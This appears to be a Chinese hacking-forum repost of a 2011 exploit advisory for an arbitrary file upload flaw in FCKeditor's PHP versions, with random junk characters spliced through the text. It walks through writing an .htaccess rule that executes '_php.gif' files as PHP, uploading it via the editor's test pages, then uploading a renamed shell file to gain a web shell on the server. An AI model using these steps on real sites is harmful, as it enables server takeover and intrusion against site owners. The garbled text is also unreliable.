找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2350|回复: 0
打印 上一主题 下一主题

FCKeditor所有php版本Upload上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-10-27 17:25:21 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
FCKeditor所有php版本Upload上传漏洞( w+ C- e$ r5 \6 t* ~& H
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07" f) z" i# N" j" f
减小字体 增大字体2 n9 L/ T' J+ |7 b
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability7 \1 x$ {4 T7 s- C
[+] Date: 2011% ^( g6 m& h2 y$ N' T' d
[+] Author : sinesafe.cn
  S5 _1 y: ^  w8 q8 ?/ T5 g[+] Website : WwW.sinesafe.cn) j: y% \) b( a$ J
———————————————————. D+ i& v- T2 i5 v
1.create a htaccess file:- A6 r: i* @& A3 ]# g
code:( |+ a+ H( a, G% w
<FilesMatch “_php.gif”>
5 e7 J5 j9 y5 H: OSetHandler application/x-httpd-php% V7 u  L: h: P1 S0 y( H
</FilesMatch>6 [* r+ ]. ?" ?3 R: A9 A+ d' F

4 K1 L% O$ [3 V  h; U2.Now upload this htaccess with FCKeditor." S' k% W$ r" u0 g+ R$ n

7 @- t$ m* _. fhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html1 o* Q9 a# @/ K4 f6 b7 G
6 z- Q9 V0 P  ?( ]& ?7 E
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html$ M. \, c) F1 M. K# p1 Y" q- t

/ k- D# v6 C. ]" E0 f———————————————————————————————-
+ x9 ^: ^# ]/ J( a" z; D) O3.Now upload shell.php.gif with FCKeditor.
; ]# p' i8 U' p5 S' y& O4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.8 E& B- x! f: W  ]/ B. f2 O* N
5.http://www.sinesafe.cn/anything/shell_php.gif
, k! P" q& t7 X6 h, m6 T' L: E6.Now shell is available from server.
4 x5 `- P2 ~/ C, P' ~! ?5 b3 q

" I" S/ Q# g* D' Z
( t3 A# o9 S9 l8 c8 R# @  m% r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表